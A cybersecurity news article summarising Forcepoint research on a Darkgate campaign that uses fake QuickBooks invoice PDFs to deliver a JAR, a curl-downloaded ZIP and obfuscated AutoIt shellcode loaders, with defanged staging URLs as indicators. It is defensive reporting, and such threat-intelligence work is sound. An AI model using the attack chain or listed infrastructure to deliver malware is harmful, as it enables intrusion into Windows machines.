Cyber Security

Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

Hackers often target XLSX, HTML, and PDF files as they are widely used, and their trustable file formats also attract them.

This makes it easier to deliver them successfully to recipients who may not be aware.

Forcepoint researchers recently asserted that the Darkgate malware is distributed via phishing emails that have malicious attachments such as XLSX, HTML, or pdf which take over accounts and replicate themselves. 

It is persistent in the sense that it can go unnoticed while endangering lost data, fraud, blackmail, and exposed sensitive information.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

Technical Analysis

Forcepoint X-Labs analyzed a recent Darkgate campaign initiated through a phishing email containing a fake Intuit Quickbooks invoice PDF. 

It tricks users into clicking a link to install Java but instead redirects them to a geofenced URL that surreptitiously downloads the next malware stage payload.

Attack Chain (Source – Forcepoint)

A malicious “may-document_[number].pdf” file analysis demonstrates an invoice PDF with an embedded hyperlink in a large XObject image.

Clicking the link downloads a malicious .jar file. The associated URLs share patterns with those used by QakBot actors before, indicating potential connections.

Analyzing the malicious “.jar” file with JD-GUI exposed a “.PNG” and an obfuscated “.class” file containing code to download a “.ZIP” file to C:\Downloads\ using a curl.exe command. 

Upon downloading the ZIP, it leverages PowerShell’s expand-archive to extract the contents.

This class file can also download and save MSI files. Within the ZIP, AutoIt3.exe and a compiled AutoIt script in .a3x format have been extracted, which are then run by the JAR via an obfuscated cmd command.

Darkgate has used AutoIt elsewhere, and this script was compiled using AutoIt 3.26+ with AU3!EA06 headers. Further investigation is needed to determine what this script does.

The operations BITXOR and BinaryToString() of AutoIt are difficult to understand. This tool merges a large data stream into a local variable.

DLLSTRUCTCREATE() library function allows bytes to be loaded into memory and then abuse system resources. Scripts obtain shell code and join with the server botnet remotely.

The Darkgate campaign deploys phishing emails pretending to be QuickBooks invoices to make users download malicious JAR files containing directions for more payloads, such as obfuscated AutoIt scripts. 

These scripts run shell code and communicate to remote servers. The Darkgate campaign has nicely blended professional malware techniques and historical URL patterns consequently demonstrating an advanced persistent threat (APT).


Initial Stage URLs:

  • afarm[.]net/uvz2q
  • affixio[.]com/emh0c
  • affiliatebash[.]com/myu0f
  • afcmanager[.]net/jxk6m
  • adventsales[.]co[.]uk/iuw8a
  • amikamobile[.]com/ayu4d
  • adztrk[.]com/ixi7r
  • aerospaceavenue[.]com/cnz8g
  • amishwoods[.]com/jwa4v

Second stage URL:

  • smbeckwithlaw[.]com/1[.]zip


  • ​kindupdates[.]com

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Bondnet Using High-Performance Bots For C2 Server

Threat actors abuse high-performance bots to carry out large-scale automated attacks efficiently. These bots can…

40 mins ago

Discord-Based Malware Attacking Orgs Linux Systems In India

Linux systems are deployed mostly in servers, in the cloud, and in environments that are…

46 mins ago

New Moonstone Sleet North Korean Actor Deploying Malicious Open Source Packages

In December 2023, we reported on how North Korean threat actors, particularly Jade Sleet, have…

3 hours ago

Life360 Breach: Hackers Accessed the Tile Customer Support Platform

Life360, a company known for its family safety services, recently fell victim to a criminal…

5 hours ago

Microsoft Delays Release of Controversial Windows AI Recall Tool Amid Privacy Concerns

Microsoft has announced that it will delay the broad release of its AI-powered Recall feature…

9 hours ago

SmokeLoader – A Modular Malware With Range Of Capabilities

Hackers misuse malware for diverse illicit intentions, including data theft, disrupting systems, espionage, or distortion…

23 hours ago